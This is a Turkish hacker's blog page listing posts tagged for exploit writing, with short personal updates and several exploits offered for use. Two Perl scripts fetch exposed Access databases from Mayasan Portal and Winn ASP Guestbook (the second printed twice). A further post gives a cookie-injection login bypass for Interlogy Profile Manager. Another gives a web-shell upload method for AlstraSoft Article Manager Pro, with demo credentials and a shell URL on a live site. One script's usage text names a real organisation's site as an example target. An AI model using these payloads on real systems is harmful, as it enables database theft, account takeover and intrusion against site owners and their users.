exploit yazma etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
exploit yazma etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
26 Temmuz 2011 Salı
özlemişim :))
ocak 17-temmuz 26 baya bi zaman geçmiş :)) pr aşağı düşmüş aşağılık kopmleksi yaşıyormuş :P doktor muhtemelen asker ;) life kardeşimle görüşemedim bile :(( bla aylardır bloğuna uğramamış ben gibi :(( vs vs vs ben neler yaptım küçük bi site tasarladım public yaparım çok eksiği var :) ama tema vs beni sardı. buffer overflow a baya bi yoğunlaştım ara ara kafayı mı yiyorum diye tereddütler yaşayınca aralar verdim :) verdiğim aralarda da siteyi tasarladım :) php baya bi ilerlettim yani uzmanlık seviyesinde değil ama benim işimi görüyor. bol bol lfi ile uğrastım :DD keza python yine baş tacı :)) 20 bilemedin 25 gün kadar da kpss hazırlandım çok bile :)) bu kadar başka değişiklik yok.
2 Ağustos 2010 Pazartesi
exploitler ile ilgili
şimdi bu blogspot kafasına göre güvenlik uygulaması yapıyor ya :D dolayısıyla exploitleri tam yayınlayamıyorum yani kodlar eksik olabilir benim blogda. dolayısıyla verdiğim orjinal linklerden kullanın ;) blogspottan sıkılmaya başladım bakalım çözüm nolcak :S
Mayasan Portal V 1.0 / V 2.0 Database Disclosure Exploit (.pl)
http://inj3ct0r.com/exploits/13524
========================================================
MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit
========================================================
#!/usr/bin/perl -w
#
# MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit
#
# Found & Coded: ZoRLu
#
# Tested on my vista proof: http://img37.imageshack.us/img37/3531/testcz.jpg
#
# Date: 25/07/2010
#
# Home: z0rlu.blogspot.com
#
# Thanks: Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
#
# Download : http://mportal.somee.com/indir/v20/v20/v20.zip
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit');
system('color 4');
if(@ARGV < 2)
{
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit *\n";
print "\* Exploited By : ZoRLu *\n";
print "\* msn : admin[at]yildirimordulari.com *\n";
print "\* Home : http://z0rlu.blogspot.com *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="db/mayasanportal.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");
if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
# Inj3ct0r.com [2010-07-30]
16 Ekim 2009 Cuma
beynimde buffer overflow :( msnim hacklen(me)miş olabilir
şurdan vardım o kanıya birincisi hiç oturum acılmadı benim msn de a.q hiç olmasa hacked by x yazıp hava atardı hackleyen ben rastlamadım rastlayan olduysa burdan bildirsin lütfen ;) ikincisi benim msn ile bloğuda hackleyebilirdi fakat herhangi bi hamle yapılmamış yani sifre talep edip bloğu ele gecirebilirdi hackleyen kişi. geriye tek bi ihtimal kaldı msn şifremi değiştim fakat şimdi hatırlayamıyorum. o günlerde buffer overflow ile meşguldüm en sonunda başardım 2 program için buffer overflow exploit yazdım onu başardım fakat farkında olmadan beynimde de bi hafıza taşması oldu mu diye düşünmüyor değilim :( biraz mola vermenin zamanı geldi gibi :(
9 Haziran 2009 Salı
Interlogy Profile Manager Basic Insecure Cookie Handling Vulnerability
kaynak: http://www.milw0rm.com/exploits/8895
kaynak: http://yildirimordulari.com/showthread.php?t=8551
kaynak: http://yildirimordulari.com/showthread.php?t=8551
desc:
normal login for cookie
pmadm=dGVzdA;
if ý do this:
pmadm=dGVzd(write any thing);
example:
pmadm=dGVzdz;
or
pmadm=dGVzd123231212313;
not login
if ý do wthis:
pmadm=dGVzd ' or ';
boom this loggin :D
exp:
javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";
after you go here:
http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp
or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users
2 Haziran 2009 Salı
AlstraSoft Article Manager Pro Remote Shell Upload Vulnerability
kaynak: http://www.milw0rm.com/exploits/8855
kaynak: http://www.yildirimordulari.com/showthread.php?t=7689
kaynak: http://www.yildirimordulari.com/showthread.php?t=7689
add this code you shell head:
exapmle:
GIF89a;
...
...
...
?>
save you shell.php
after go here:
yildirimordulari.com/article/register.php
after select your shell.php
done register after login to site edit your profile
and you look your shell name
yildirimordulari.com/article/images/author_pics/[id].php
example demo:
http://www.blizsoft.com/article/register.php
user: salla
pass: 123a123
shell:
http://www.blizsoft.com/article/images/author_pics/41.php
4 Mayıs 2009 Pazartesi
Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit
kaynak: http://www.milw0rm.com/exploits/8596
kaynak: http://www.yildirimordulari.com/showthread.php?t=6326
#!/usr/bin/perl -w
#
# Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit
#
# Found By : ZoRLu
#
# Home: yildirimordulari.com , dafgamers.com , z0rlu.blogspot.com
#
# Not: Bana Bug BulamIyorum, YapamIyorum Demeyin a.q Elin Gavuru YapIyor Sizler Niye YapamIyorsunuz. istemiyorsunuz isteseniz Sizlerde YaparsInýz
#
# Thanks: Str0ke, Cyber-Zone, Stack, AlpHaNiX, W0cker, Dr.Ly0n, ThE g0bL!N and all Friends
#
# Download : http://winn.ws/downloads/asp-guestbook-v1-01.zip
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Exp KullanIm HatasI\n";
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] KullanIm : perl $0 url/IP Path \n";
print "[+] if your target have a path : perl $0 site.com /path/ \n";
print "[+] example : perl $0 lifelinesydney.org /asp-guestbook/ \n";
print "[+] if your target doesnt have a path : perl $0 site.com / \n";
print "[+] example : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit *\n";
print "\* Exploited By : ZoRLu *\n";
print "\* msn : trt-turk[at]hotmail.com *\n";
print "\* Home : yildirimordulari.com , dafgamers.com *\n";
print "\* Dork: Winn ASP Guestbook from Winn.ws *\n";
print "\*************************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="data/guestbook.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n WWW.YiLDiRiMORDULARi.COM\n\n";
print "\n wait!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");
if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
kaynak: http://www.yildirimordulari.com/showthread.php?t=6326
#!/usr/bin/perl -w
#
# Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit
#
# Found By : ZoRLu
#
# Home: yildirimordulari.com , dafgamers.com , z0rlu.blogspot.com
#
# Not: Bana Bug BulamIyorum, YapamIyorum Demeyin a.q Elin Gavuru YapIyor Sizler Niye YapamIyorsunuz. istemiyorsunuz isteseniz Sizlerde YaparsInýz
#
# Thanks: Str0ke, Cyber-Zone, Stack, AlpHaNiX, W0cker, Dr.Ly0n, ThE g0bL!N and all Friends
#
# Download : http://winn.ws/downloads/asp-guestbook-v1-01.zip
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Exp KullanIm HatasI\n";
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] KullanIm : perl $0 url/IP Path \n";
print "[+] if your target have a path : perl $0 site.com /path/ \n";
print "[+] example : perl $0 lifelinesydney.org /asp-guestbook/ \n";
print "[+] if your target doesnt have a path : perl $0 site.com / \n";
print "[+] example : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit *\n";
print "\* Exploited By : ZoRLu *\n";
print "\* msn : trt-turk[at]hotmail.com *\n";
print "\* Home : yildirimordulari.com , dafgamers.com *\n";
print "\* Dork: Winn ASP Guestbook from Winn.ws *\n";
print "\*************************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="data/guestbook.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n WWW.YiLDiRiMORDULARi.COM\n\n";
print "\n wait!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");
if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
Kaydol:
Kayıtlar (Atom)